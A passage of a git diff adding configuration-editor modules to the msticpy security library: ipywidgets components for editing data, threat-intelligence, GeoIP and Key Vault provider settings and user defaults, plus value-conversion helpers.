+        isinstance(ctrl, _TEXT_WIDGETS) and getattr(ctrl, "tag", None) == "txt_dict"
+    ):
+        return dict_to_txt(value)
+    if val_type == "list" or (
+        isinstance(ctrl, _TEXT_WIDGETS) and getattr(ctrl, "tag", None) == "list"
+    ):
+        return "\n".join(value)
+    if val_type == "str" or isinstance(ctrl, _TEXT_WIDGETS) or isinstance(value, str):
+        if value is None:
+            return ""
+        return str(value)
+    return value
+
+
+def widget_to_py(ctrl: Union[widgets.Widget, SettingsControl]) -> Any:
+    """
+    Adjust type and format of value returned from `ctrl.value`.
+
+    Parameters
+    ----------
+    ctrl : Union[widgets.Widget, SettingsControl]
+        The source widget
+
+    Returns
+    -------
+    Any
+        Converted value.
+
+    Notes
+    -----
+    This function handles conversion of widget values to
+    configuration (Python) values.
+
+    """
+    if isinstance(ctrl, widgets.Checkbox):
+        return ctrl.value
+    if isinstance(ctrl, widgets.Textarea) and getattr(ctrl, "tag", None) == "txt_dict":
+        return txt_to_dict(ctrl.value) or None
+    if isinstance(ctrl, widgets.Textarea) and getattr(ctrl, "tag", None) == "list":
+        return ctrl.value.split("\n") if ctrl.value else []
+    if isinstance(ctrl, _TEXT_WIDGETS):
+        if ctrl.value == "":
+            return None
+        return str(ctrl.value)
+    if isinstance(ctrl, widgets.SelectMultiple):
+        return list(ctrl.value)
+    return None if not ctrl.value else ctrl.value
+
+
+# pylint: enable=too-many-return-statements
+
+
+def get_def_tenant_id(sub_id: str) -> Optional[str]:
+    """
+    Get the tenant ID for a subscription.
+
+    Parameters
+    ----------
+    sub_id : str
+        Subscription ID
+
+    Returns
+    -------
+    Optional[str]
+        TenantID or None if it could not be found.
+
+    Notes
+    -----
+    This function returns the tenant ID that owns the subscription.
+    This may not be the correct ID to use if you are using delegated
+    authorization via Azure Lighthouse.
+
+    """
+    res_mgmt_uri = AzureCloudConfig().endpoints.resource_manager
+    get_tenant_url = (
+        f"{res_mgmt_uri}/subscriptions/{{subscriptionid}}" + "?api-version=2015-01-01"
+    )
+    resp = httpx.get(get_tenant_url.format(subscriptionid=sub_id))
+    # Tenant ID is returned in the WWW-Authenticate header/Bearer authorization_uri
+    www_header = resp.headers.get("WWW-Authenticate")
+    if not www_header:
+        return None
+    hdr_dict = {
+        item.split("=")[0]: item.split("=")[1].strip('"')
+        for item in www_header.split(", ")
+    }
+    tenant_path = hdr_dict.get("Bearer authorization_uri", "").split("/")
+    return tenant_path[-1] if tenant_path else None
+
+
+def txt_to_dict(txt_val: str) -> Dict[str, Any]:
+    """
+    Return dict from string of "key:val; key2:val2" pairs.
+
+    Parameters
+    ----------
+    txt_val : str
+        The key/value string (items separated by ";",
+        key/value separated by ":")
+
+    Returns
+    -------
+    Dict[str, Any]
+        Dictionary of key/values
+
+    """
+    if not txt_val:
+        return {}
+    kvpairs = [
+        kv_pair.strip().split(":", maxsplit=1)
+        for kv_pair in txt_val.split("\n")
+        if kv_pair.strip()
+    ]
+    return {
+        kval[0].strip(): kval[1].strip() if len(kval) > 1 else None for kval in kvpairs
+    }
+
+
+def dict_to_txt(dict_val: Union[str, Dict[str, Any]]) -> str:
+    """
+    Return string as "key:val; key2:val2" pairs from `dict_val`.
+
+    Parameters
+    ----------
+    dict_val : Union[str, Dict[str, Any]]
+        Dict of key/val pairs
+        or string of single key/value
+
+    Returns
+    -------
+    str
+        str formatted as "key:val; key2:val2"
+
+    """
+    if isinstance(dict_val, str):
+        if not dict_val:
+            return ""
+        if ":" in dict_val:
+            key, val = dict_val.split(":", maxsplit=1)
+        else:
+            key, val = dict_val, ""
+        return f"{key}:{val}"
+    if isinstance(dict_val, dict):
+        return "\n".join(f"{key}:{val}" for key, val in dict_val.items())
+    return ""
+
+
+# flake8: noqa: F821
+def get_wgt_ctrl(
+    setting_path: str,
+    var_name: str,
+    mp_controls: "MpConfigControls",  # type: ignore
+    wgt_style: Optional[Dict[str, Any]] = None,
+) -> widgets.Widget:
+    """
+    Return widget appropriate to value type of `var_name`.
+
+    Parameters
+    ----------
+    setting_path : str
+        The setting path (parent path) as dotted string.
+    var_name : str
+        The key name for the setting below `setting_path`.
+    mp_controls : MpConfigControls
+        Instance of MpConfigControls data
+    wgt_style : Optional[Dict[str, Any]]
+        Dict of style and layout items:
+        .. parsed-literal::
+
+            {
+                "style": {"description_width": "100px"},
+                "layout": widgets.Layout(width="50%")
+            }
+
+    Returns
+    -------
+    widgets.Widget
+        The widget.
+
+    """
+    if wgt_style is None:
+        wgt_style = {}
+    var_path = f"{setting_path}.{var_name}"
+    ctrl = mp_controls.get_control(var_path)
+    comp_defn = mp_controls.get_defn(var_path)
+    if comp_defn and not isinstance(comp_defn, tuple):
+        # definition is a literal
+        def_value = comp_defn
+    else:
+        st_type, st_opts = get_defn_or_default(comp_defn)
+        def_value = st_opts["default"] if st_opts and "default" in st_opts else ""
+    curr_val = mp_controls.get_value(var_path) or def_value
+
+    if ctrl is None:
+        st_type, st_opts = get_defn_or_default(comp_defn)
+        if st_type == "bool":
+            ctrl = widgets.Checkbox(
+                description=var_name,
+                value=py_to_widget(curr_val, val_type=st_type),
+                **(wgt_style or TEXT_LAYOUT),
+            )
+        elif st_type == "enum":
+            ctrl = widgets.Select(
+                description=var_name,
+                options=st_opts.get("options"),
+                value=curr_val or "",
+                **(wgt_style or SETTING_LIST_LAYOUT),
+            )
+        elif st_type == "m_enum":
+            ctrl = widgets.SelectMultiple(
+                description=var_name,
+                options=st_opts.get("options"),
+                value=curr_val or [],
+                **(wgt_style or SETTING_LIST_LAYOUT),
+            )
+        elif st_type == "txt_dict":
+            ctrl = widgets.Textarea(
+                description=var_name, value=dict_to_txt(curr_val) or "", **wgt_style
+            )
+            setattr(ctrl, "tag", "txt_dict")
+        elif st_type == "list":
+            ctrl = widgets.Textarea(
+                description=var_name,
+                value=py_to_widget(curr_val, val_type="list") or "",
+                **(wgt_style or TEXT_AREA_LAYOUT),
+                # tooltip="Enter each item as 'key:value'. Separate items with new lines.",
+            )
+            setattr(ctrl, "tag", "list")
+        else:
+            ctrl = widgets.Text(
+                description=var_name,
+                value=py_to_widget(curr_val, val_type=st_type),
+                **(wgt_style or TEXT_AREA_LAYOUT),
+                # tooltip="Enter items (no quotes) on separate lines.",
+            )
+        mp_controls.set_control(var_path, ctrl)
+    else:
+        ctrl.value = py_to_widget(curr_val, ctrl=ctrl)
+    return ctrl
+
+
+def get_defn_or_default(defn: Union[Tuple[str, Any], Any]) -> Tuple[str, Dict]:
+    """
+    Return the type and options (or a default) for the setting definition.
+
+    Parameters
+    ----------
+    defn : Optional[Tuple[str, dict]]
+        Setting definition. Returns a default of "str", {}
+        if no definition is passed.
+
+    Returns
+    -------
+    Tuple[str, Dict]
+        Tuple of setting type and options.
+
+    """
+    if isinstance(defn, tuple):
+        return defn[0], defn[1]
+    return "str", {}
+
+
+# flake8: noqa: F821
+def get_or_create_mpc_section(
+    mp_controls: "MpConfigControls", section: str, subkey: Optional[str] = None  # type: ignore
+) -> Any:
+    """
+    Return (and create if it doesn't exist) a settings section.
+
+    Parameters
+    ----------
+    mp_controls : MpConfigControls
+        The MP Config database.
+    section : str
+        The section name (top level settings item)
+    subkey : Optional[str], optional
+        Optional subkey to create, by default None
+
+    Returns
+    -------
+    Any
+        The settings at that section[subkey] location.
+
+    """
+    curr_section = mp_controls.get_value(section)
+    if curr_section is None:
+        mp_controls.set_value(section, {})
+        curr_section = mp_controls.get_value(section)
+    if subkey and subkey not in curr_section:
+        mp_controls.set_value(f"{section}.{subkey}", {})
+        return mp_controls.get_value(f"{section}.{subkey}")
+    return mp_controls.get_value(section)
diff --git a/msticpy/config/ce_data_providers.py b/msticpy/config/ce_data_providers.py
new file mode 100644
index 000000000..4ae7aa8c1
--- /dev/null
+++ b/msticpy/config/ce_data_providers.py
@@ -0,0 +1,126 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data Providers Component Edit."""
+import re
+from typing import Optional
+
+import ipywidgets as widgets
+
+from .._version import VERSION
+from .ce_common import TEXT_LAYOUT
+from .ce_provider_base import CEProviders, HELP_URIS
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-ancestors, duplicate-code
+class CEDataProviders(CEProviders):
+    """Data providers edit component."""
+
+    _DESCRIPTION = "Settings for Data Providers"
+    _COMP_PATH = "DataProviders"
+    # _HELP_TEXT inherited from base
+    _HELP_URI = {
+        "Data Providers": (
+            "https://msticpy.readthedocs.io/en/latest/" + "DataAcquisition.html"
+        ),
+        "Spunk": (
+            "https://msticpy.readthedocs.io/en/latest/data_acquisition/SplunkProvider.html"
+        ),
+        "Sumologic": (
+            "https://github.com/microsoft/msticpy/blob/main/docs/notebooks/"
+            "Sumologic-DataConnector.ipynb"
+        ),
+        "Security Datasets (aka Mordor)": (
+            "https://msticpy.readthedocs.io/en/latest/data_acquisition/MordorData.html"
+        ),
+        **HELP_URIS,
+    }
+
+    _COMPONENT_HELP = """
+    <p><b>LocalData provider <i>data_paths</i></b>
+    Enter one or more data paths, separated by new lines
+    </p>
+
+    """
+
+    def __init__(self, mp_controls: MpConfigControls):
+        """
+        Initialize an instance of the component.
+
+        Parameters
+        ----------
+        mp_controls : MpConfigControls
+            The config/controls/settings database
+
+        """
+        self.text_prov_instance = widgets.Text(
+            description="Provider instance",
+            placeholder="(optional) instance name for provider",
+            **TEXT_LAYOUT,
+        )
+        super().__init__(mp_controls)
+        self._last_instance_path: Optional[str] = None
+
+    @property
+    def _current_path(self):
+        if self._current_instance_name:
+            return f"{self._COMP_PATH}.{self._prov_ctrl_name}-{self._current_instance_name}"
+        return f"{self._COMP_PATH}.{self._prov_ctrl_name}"
+
+    @property
+    def _prov_name(self) -> str:
+        if self.text_prov_instance.value:
+            return f"{super()._prov_name}-{self.text_prov_instance.value}"
+        return super()._prov_name
+
+    @property
+    def _prov_ctrl_name(self):
+        """Return the provider generic name (minus instance suffix)."""
+        return super()._prov_name
+
+    @property
+    def _prov_instance_name(self):
+        """Return the provider instance name (minus instance suffix)."""
+        if "-" in super()._prov_name:
+            return super()._prov_name.split("-", maxsplit=1)[1]
+        return self.text_prov_instance.value
+
+    @property
+    def _current_instance_name(self):
+        """Return the current instance name."""
+        return self.text_prov_instance.value.strip()
+
+    def _populate_edit_ctrls(self, control_name: Optional[str] = None):
+        super()._populate_edit_ctrls(control_name=control_name)
+        # add the instance text box
+        self.edit_ctrls.children = [
+            self.text_prov_instance,
+            *(self.edit_ctrls.children),
+        ]
+        self.edit_frame.children = [self.edit_ctrls]
+
+    def _select_provider(self, change):
+        super()._select_provider(change)
+        self.text_prov_instance.value = self._prov_instance_name
+        self._last_instance_path = self._current_path
+
+    def _save_provider(self, btn):
+        if self._current_instance_name:
+            if not re.match(r"^[\w._:]+$", self._current_instance_name):
+                self.set_status(
+                    "Error: instance name can only contain alphanumeric and '._:'"
+                )
+                return
+            # The instance name may have changed, which alters the path
+            self.mp_controls.rename_path(self._last_instance_path, self._current_path)
+        super()._save_provider(btn)
+        # refresh the item list and re-select the current item
+        edited_provider = self._prov_name
+        self.select_item.options = self._get_select_opts()
+        self.select_item.label = edited_provider
diff --git a/msticpy/config/ce_keyvault.py b/msticpy/config/ce_keyvault.py
new file mode 100644
index 000000000..681c504ae
--- /dev/null
+++ b/msticpy/config/ce_keyvault.py
@@ -0,0 +1,45 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Key Vault component edit."""
+from .._version import VERSION
+from .ce_simple_settings import CESimpleSettings
+
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class CEKeyVault(CESimpleSettings):
+    """Key Vault settings edit component."""
+
+    _DESCRIPTION = "Key Vault Setup"
+    _COMP_PATH = "KeyVault"
+    _HELP_TEXT = """
+    Set the parameters for your Key Vault here to store secret
+    values such as API Keys.<br>
+
+    Check <b>UseKeyring</b> if you have Keyring installed and want to be
+    able to cache the secrets locally. (Note: keyring is not supported
+    by default on many Linux distributions)<br>
+
+    The first five items are mandatory.<br>
+
+    The value for <b>Authority</b> should be set to the Azure Cloud that you use.<br>
+    Options are:
+    <ul>
+    <li>global (Commercial Azure cloud)</li>
+    <li>usgov (US Government cloud)</li>
+    <li>cn (China national cloud)</li>
+    <li>de (German national cloud)</li>
+    </ul>
+    The default is "global".<br>
+    """
+    _HELP_URI = {
+        "Key Vault Settings": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "msticpyconfig.html#specifying-secrets-as-key-vault-secrets"
+        )
+    }
diff --git a/msticpy/config/ce_other_providers.py b/msticpy/config/ce_other_providers.py
new file mode 100644
index 000000000..9592ff39d
--- /dev/null
+++ b/msticpy/config/ce_other_providers.py
@@ -0,0 +1,27 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Other Providers Component Edit."""
+from .._version import VERSION
+from .ce_provider_base import CEProviders, HELP_URIS
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-ancestors, duplicate-code
+class CEOtherProviders(CEProviders):
+    """Other (GeoIP) providers edit component."""
+
+    _DESCRIPTION = "Settings for Other (GeoIP) Providers"
+    _COMP_PATH = "OtherProviders"
+    # _HELP_TEXT inherited from base
+    _HELP_URI = {
+        "GeoIP Providers": (
+            "https://msticpy.readthedocs.io/en/latest/"
+            + "data_acquisition/GeoIPLookups.html"
+        ),
+        **HELP_URIS,
+    }
diff --git a/msticpy/config/ce_provider_base.py b/msticpy/config/ce_provider_base.py
new file mode 100644
index 000000000..53e0a422c
--- /dev/null
+++ b/msticpy/config/ce_provider_base.py
@@ -0,0 +1,214 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from abc import ABC
+from typing import Optional
+
+import ipywidgets as widgets
+
+from .._version import VERSION
+from .ce_common import (
+    ITEM_LIST_LAYOUT,
+    get_wgt_ctrl,
+    get_or_create_mpc_section,
+    get_defn_or_default,
+)
+from .comp_edit import CEItemsBase, CompEditDisplayMixin
+from .compound_ctrls import get_arg_ctrl
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_PROV_GENERIC_HELP = """
+Select a provider to edit its settings.<br>
+To add a new provider, select the name from the "Add prov" drop-down and click "Add"<br>
+
+The Storage option tells the settings module to look for the
+value in one of three places:
+<ul>
+    <li>Text - this is the usual way to store values that are not sensitive</li>
+    <li>Environment Var - Type the name of variable in the text box</li>
+    <li>Key Vault - use this for sensitive data like passwords and API keys<br>
+    The KeyVault value here can be left empty (the secret name is generated
+    from the settings path), can contain a secret name or can contain a
+    path {vaultname}/{secretname}
+    </li>
+</ul>
+
+<b>Note:</b> Storing values in KeyVault requires some work on your part<br>
+You must do the following:
+<ol>
+    <li>Create the Key Vault</li>
+    <li>Add the settings for the Vault in the KeyVault section of the configuration</li>
+    <li>Add the values that you want to use to the Vault</li>
+</ol>
+The Key Vault Configuration link below describes this setup and how you can
+configure your Key Vault settings and transfer secrets settings from your
+configuration file to a vault.
+"""
+
+HELP_URIS = {
+    "Key Vault Configuration": (
+        "https://msticpy.readthedocs.io/en/latest/getting_started/"
+        + "msticpyconfig.html#specifying-secrets-as-key-vault-secrets"
+    ),
+    "MSTICPy Configuration": (
+        "https://msticpy.readthedocs.io/en/latest/"
+        + "getting_started/msticpyconfig.html"
+    ),
+    "Help on this tab": (
+        "https://msticpy.readthedocs.io/en/latest/getting_started/"
+        + "SettingsEditor.html#adding-threat-intelligence-ti-providers"
+    ),
+}
+
+
+# pylint: disable=too-many-ancestors
+class CEProviders(CEItemsBase, ABC):
+    """Abstract base class for Provider edit components."""
+
+    _HELP_TEXT = _PROV_GENERIC_HELP
+
+    def __init__(self, mp_controls: MpConfigControls):
+        """
+        Initialize an instance of the component.
+
+        Parameters
+        ----------
+        mp_controls : MpConfigControls
+            The config/controls/settings database
+
+        """
+        super().__init__(mp_controls)
+
+        get_or_create_mpc_section(self.mp_controls, self._COMP_PATH)
+        self.prov_settings_map = _get_map(mp_controls.get_value(self._COMP_PATH))
+        self.select_item.options = self._get_select_opts()
+        self.select_item.layout = ITEM_LIST_LAYOUT["layout"]
+        self.select_item.style = ITEM_LIST_LAYOUT["style"]
+        self.select_item.description = "Providers"
+        self.select_item.observe(self._select_provider, names="label")
+
+        self.prov_options = widgets.Dropdown(
+            options=self.mp_controls.get_defn(path=self._COMP_PATH).keys(),
+            description="Add prov",
+            value=self.select_item.label,
+            style=ITEM_LIST_LAYOUT["style"],
+        )
+        self.items_frame.children = [*(self.items_frame.children), self.prov_options]
+
+        self._populate_edit_ctrls()
+
+        self.edit_buttons.btn_del.on_click(self._del_provider)
+        self.edit_buttons.btn_add.on_click(self._add_provider)
+        self.edit_buttons.btn_save.on_click(self._save_provider)
+
+    @property
+    def _current_path(self) -> str:
+        """Return current settings path."""
+        return f"{self._COMP_PATH}.{self.select_item.label}"
+
+    @property
+    def _prov_name(self) -> str:
+        """Return current provider instance name."""
+        prov_name = self.select_item.label or ""
+        return prov_name.strip()
+
+    @property
+    def _prov_ctrl_name(self) -> str:
+        """Return current provider control name."""
+        return self._prov_name
+
+    def _get_select_opts(self):
+        """Get provider options to populate select list."""
+        provs = self.mp_controls.get_value(self._COMP_PATH)
+        self.prov_settings_map = _get_map(provs)
+        return [(val, idx) for idx, val in enumerate(sorted(provs.keys()))]
+
+    def _populate_edit_ctrls(self, control_name: Optional[str] = None):
+        self.edit_ctrls = _get_prov_ctrls(
+            control_name or self._prov_ctrl_name, self.mp_controls, self._COMP_PATH
+        )
+        self.edit_frame.children = [self.edit_ctrls]
+
+    def _select_provider(self, change):
+        """Update based on new selection in current providers."""
+        del change
+        self._populate_edit_ctrls()
+        self.mp_controls.populate_ctrl_values(
+            f"{self._COMP_PATH}.{self.select_item.label}"
+        )
+
+    def _add_provider(self, btn):
+        """Add a new provider from prov_options."""
+        del btn
+        if self.prov_options.label in dict(self.select_item.options):
+            self.set_status(f"This provider already exists: {self.prov_options.label}")
+            return
+        if not self.prov_options.label:
+            self.set_status("Error: please select a provider name to add.")
+            return
+        self._populate_edit_ctrls(control_name=self.prov_options.label)
+        self.mp_controls.save_ctrl_values(
+            f"{self._COMP_PATH}.{self.prov_options.label}"
+        )
+        self.select_item.options = self._get_select_opts()
+        self.select_item.label = self.prov_options.label
+
+    def _del_provider(self, btn):
+        """Delete the currently selected provider."""
+        del btn
+        if not self.select_item.label:
+            return
+        self.mp_controls.del_value(self._current_path)
+        remaining_opts = self._get_select_opts()
+        self.select_item.options = remaining_opts
+        if remaining_opts:
+            self.select_item.label = remaining_opts[-1][0]
+
+    def _save_provider(self, btn):
+        """Save/update the currently edited provider settings."""
+        del btn
+        if not self.select_item.label:
+            return
+        self.mp_controls.save_ctrl_values(self._current_path)
+        val_results = self.mp_controls.validate_setting(self._current_path)
+        status = "  ".join(res[1] for res in val_results if not res[0])
+        if status:
+            self.set_status(status)
+
+
+def _get_prov_ctrls(prov_name, mp_controls, conf_path):
+    ctrls = []
+    if not prov_name:
+        return widgets.VBox(ctrls, layout=CompEditDisplayMixin.no_border_layout("95%"))
+    prov_path = f"{conf_path}.{prov_name}"
+    prov_defn = mp_controls.get_defn(prov_path)
+
+    for setting in prov_defn:
+        if setting != "Args":
+            wgt = get_wgt_ctrl(prov_path, setting, mp_controls)
+            if setting == "Provider":
+                wgt.disabled = True
+            ctrls.append(wgt)
+            continue
+
+        setting_path = f"{prov_path}.{setting}"
+        for var_name in prov_defn.get(setting):
+            comp_defn = mp_controls.get_defn(f"{setting_path}.{var_name}")
+            if get_defn_or_default(comp_defn)[0] == "cred_key":
+                arg_ctrl = get_arg_ctrl(setting_path, var_name, mp_controls)
+                ctrls.append(arg_ctrl.hbox)
+            else:
+                ctrls.append(get_wgt_ctrl(setting_path, var_name, mp_controls))
+
+    return widgets.VBox(ctrls)
+
+
+def _get_map(providers_stgs):
+    return dict(enumerate(providers_stgs.keys()))
diff --git a/msticpy/config/ce_simple_settings.py b/msticpy/config/ce_simple_settings.py
new file mode 100644
index 000000000..bc910c211
--- /dev/null
+++ b/msticpy/config/ce_simple_settings.py
@@ -0,0 +1,74 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Simple settings component edit base class."""
+import ipywidgets as widgets
+
+from .._version import VERSION
+from .comp_edit import CompEditSimple
+from .ce_common import get_wgt_ctrl, get_or_create_mpc_section
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class CESimpleSettings(CompEditSimple):
+    """Base class for components containing no item list."""
+
+    _DESCRIPTION = ""
+    _COMP_PATH = ""
+    _HELP_TEXT = ""
+    _HELP_URI = {
+        "MSTICPy Configuration": (
+            "https://msticpy.readthedocs.io/en/latest/"
+            + "getting_started/msticpyconfig.html"
+        )
+    }
+
+    def __init__(self, mp_controls: MpConfigControls):
+        """Initialize the class. Set the controls and retrieve settings."""
+        super().__init__(description=self._DESCRIPTION)
+
+        self.mp_controls = mp_controls
+        self.comp_defn = self._get_settings_path(
+            mp_controls.config_defn, self._COMP_PATH
+        )
+        self.settings = self._get_settings_path(mp_controls.mp_config, self._COMP_PATH)
+
+        self.help.set_help(self._HELP_TEXT, self._HELP_URI)
+
+        self.controls = {}
+
+        get_or_create_mpc_section(self.mp_controls, self._COMP_PATH)
+        prov_defn = mp_controls.get_defn(self._COMP_PATH)
+
+        w_style = {
+            "style": {"description_width": "100px"},
+            "layout": widgets.Layout(width="80%"),
+        }
+        self.controls = {
+            setting: get_wgt_ctrl(self._COMP_PATH, setting, mp_controls, w_style)
+            for setting in prov_defn
+        }
+        self.edit_frame.children = list(self.controls.values())
+        self.btn_save.on_click(self._save_settings)
+
+    def _save_settings(self, btn):
+        del btn
+        prov_path = f"{self._COMP_PATH}"
+        self.mp_controls.save_ctrl_values(prov_path)
+        val_results = self.mp_controls.validate_setting(prov_path)
+        status = "  ".join(res[1] for res in val_results if not res[0])
+        if status:
+            self.set_status(status)
+
+    def _check_instance_settings(self):
+        if not self._DESCRIPTION:
+            raise NotImplementedError("You must set a description for this class.")
+        if not self._COMP_PATH:
+            raise NotImplementedError("You must set the Section name for this class.")
+        if not self._HELP_TEXT:
+            raise NotImplementedError("You supply help text for this class.")
diff --git a/msticpy/config/ce_ti_providers.py b/msticpy/config/ce_ti_providers.py
new file mode 100644
index 000000000..53b0c36e0
--- /dev/null
+++ b/msticpy/config/ce_ti_providers.py
@@ -0,0 +1,27 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""TI Providers Component Edit."""
+from .._version import VERSION
+from .ce_provider_base import CEProviders, HELP_URIS
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-ancestors, duplicate-code
+class CETIProviders(CEProviders):
+    """Threat Intel providers edit component."""
+
+    _DESCRIPTION = "Settings for Threat Intelligence Providers"
+    _COMP_PATH = "TIProviders"
+    # _HELP_TEXT inherited from base
+    _HELP_URI = {
+        "Threat Intel Providers": (
+            "https://msticpy.readthedocs.io/en/latest/data_acquisition/"
+            + "TIProviders.html#configuration-file"
+        ),
+        **HELP_URIS,
+    }
diff --git a/msticpy/config/ce_user_defaults.py b/msticpy/config/ce_user_defaults.py
new file mode 100644
index 000000000..9be8d489d
--- /dev/null
+++ b/msticpy/config/ce_user_defaults.py
@@ -0,0 +1,297 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+import ipywidgets as widgets
+
+from .._version import VERSION
+from ..data import DataEnvironment
+from .ce_common import ITEM_LIST_LAYOUT, get_or_create_mpc_section
+from .comp_edit import CEItemsBase
+from .compound_ctrls import UserDefLoadComponent, UserDefQryProvCtrl
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-ancestors
+class CEAutoLoadQProvs(CEItemsBase):
+    """User Default query providers edit component."""
+
+    _COMP_PATH = "UserDefaults.QueryProviders"
+    _DESCRIPTION = "User Defaults - Auto-loaded query providers"
+    _HELP_TEXT = """
+    Choose the query providers to load when you run nbinit.init_notebook().<br>
+
+    There are two classes of providers - AzureSentinel workspaces and other
+    providers.
+    In the former case you must specify a workspace to load (by default it is
+    the "Default" workspace).
+    Other providers typically only have a single profile so there is no analgous
+    setting<br><br>
+
+    Query providers have two optional parameters:
+    <ul>
+        <li><b>alias</b> - upon loading, msticpy will create a variable based on
+        this alias, prefixed with "qry_". E.g. if you set alias="local" a variable
+        named "qry_local" is created in the Python/Jupyter namespace. You can use
+        this variable to execute queries for this provider.
+        </li>
+        <li><b>connect</b> - the default behavior is to connect/authenticate
+        this provider after loading it. Set this to False if you do not want
+        to authenticate immediately.
+        </li>
+    </ul>
+    """
+    _HELP_URI = {
+        "User Defaults": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "msticpyconfig.html#user-defaults"
+        ),
+        "Help on this tab": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "SettingsEditor.html#autoload-query-providers"
+        ),
+    }
+
+    def __init__(self, mp_controls: MpConfigControls):
+        """
+        Initialize an instance of CEAutoLoad class.
+
+        Parameters
+        ----------
+        mp_controls : MpConfigControls
+            The config/controls/settings database
+
+        """
+        super().__init__(mp_controls)
+
+        get_or_create_mpc_section(self.mp_controls, self._COMP_PATH)
+        self.select_item.options = self._get_select_opts()
+        self.select_item.layout = ITEM_LIST_LAYOUT["layout"]
+        self.select_item.style = ITEM_LIST_LAYOUT["style"]
+        self.select_item.description = "Providers"
+        self.select_item.observe(self._select_provider, names="label")
+
+        self.prov_options = widgets.Dropdown(
+            options=self._get_available_options(),
+            description="Add item",
+            value=self.select_item.label,
+            style=ITEM_LIST_LAYOUT["style"],
+        )
+        self.items_frame.children = [*(self.items_frame.children), self.prov_options]
+
+        prov_name = self.select_item.label
+        edit_ctrl = self._get_settings_ctrls(prov_name, self._COMP_PATH)
+        self.edit_ctrls = (
+            edit_ctrl if isinstance(edit_ctrl, widgets.Widget) else edit_ctrl.layout
+        )
+        self.edit_frame.children = [self.edit_ctrls]
+
+        self.edit_buttons.btn_del.on_click(self._del_component)
+        self.edit_buttons.btn_add.on_click(self._add_component)
+        self.edit_buttons.btn_save.on_click(self._save_component)
+
+    @property
+    def _current_path(self):
+        return f"{self._COMP_PATH}.{self.select_item.label}"
+
+    def _select_provider(self, change):
+        prov_name = change.get("new")
+        edit_ctrl = self._get_settings_ctrls(prov_name, self._COMP_PATH)
+        self.edit_ctrls = (
+            edit_ctrl if isinstance(edit_ctrl, widgets.Widget) else edit_ctrl.layout
+        )
+        self.edit_frame.children = [self.edit_ctrls]
+        self.mp_controls.populate_ctrl_values(f"{self._COMP_PATH}.{prov_name}")
+
+    def _add_component(self, btn):
+        del btn
+        prov_name = self.prov_options.value
+        if prov_name in self.select_item.options:
+            self.set_status(f"This provider already exists: {prov_name}")
+            return
+
+        def_value = self._get_default_values(prov_name, self._COMP_PATH)
+        if def_value is None:
+            self.set_status(f"No definition for this provider was found: {prov_name}")
+            return
+        self._get_settings_ctrls(prov_name, self._COMP_PATH)
+        self.mp_controls.save_ctrl_values(f"{self._COMP_PATH}.{prov_name}")
+        self.select_item.options = sorted([prov_name, *(self.select_item.options)])
+        self.select_item.label = prov_name
+
+    def _del_component(self, btn):
+        del btn
+        self.mp_controls.del_value(self._current_path)
+        remaining_opts = self._get_select_opts()
+        self.select_item.options = remaining_opts
+        if remaining_opts:
+            self.select_item.label = remaining_opts[-1][0]
+
+    def _save_component(self, btn):
+        del btn
+        self.mp_controls.save_ctrl_values(self._current_path)
+        val_results = self.mp_controls.validate_setting(self._current_path)
+        status = "  ".join(res[1] for res in val_results if not res[0])
+        if status:
+            self.set_status(status)
+
+    def _get_available_options(self):
+        az_sent_provs = self.mp_controls.mp_config.get("AzureSentinel")
+        if az_sent_provs:
+            # If we have Sentinel providers
+            opt_list = [f"AzureSentinel.{ws}" for ws in az_sent_provs.get("Workspaces")]
+        else:
+            opt_list = []
+        opt_list.extend(
+            {
+                DataEnvironment.parse(prov).name
+                for prov in DataEnvironment.__members__
+                if prov not in ("Unknown", "Kusto", "AzureSentinel", "LogAnalytics")
+            }
+        )
+        return opt_list
+
+    def _get_select_opts(self):
+        return list(self._get_query_providers())
+
+    def _get_query_providers(self):
+        for name, settings in self.mp_controls.get_value(self._COMP_PATH).items():
+            if name == "AzureSentinel":
+                yield from (f"{name}.{wkspace}" for wkspace in settings)
+            else:
+                yield name
+
+    def _get_settings_ctrls(self, prov_name, conf_path):
+        if not prov_name:
+            return widgets.VBox([], layout=self.no_border_layout("95%"))
+
+        setting_path = f"{conf_path}.{prov_name}"
+        prov_ctrl = self.mp_controls.get_control(setting_path)
+        if not isinstance(prov_ctrl, UserDefQryProvCtrl):
+            prov_ctrl = UserDefQryProvCtrl(prov_name)
+            self.mp_controls.set_control(setting_path, prov_ctrl)
+
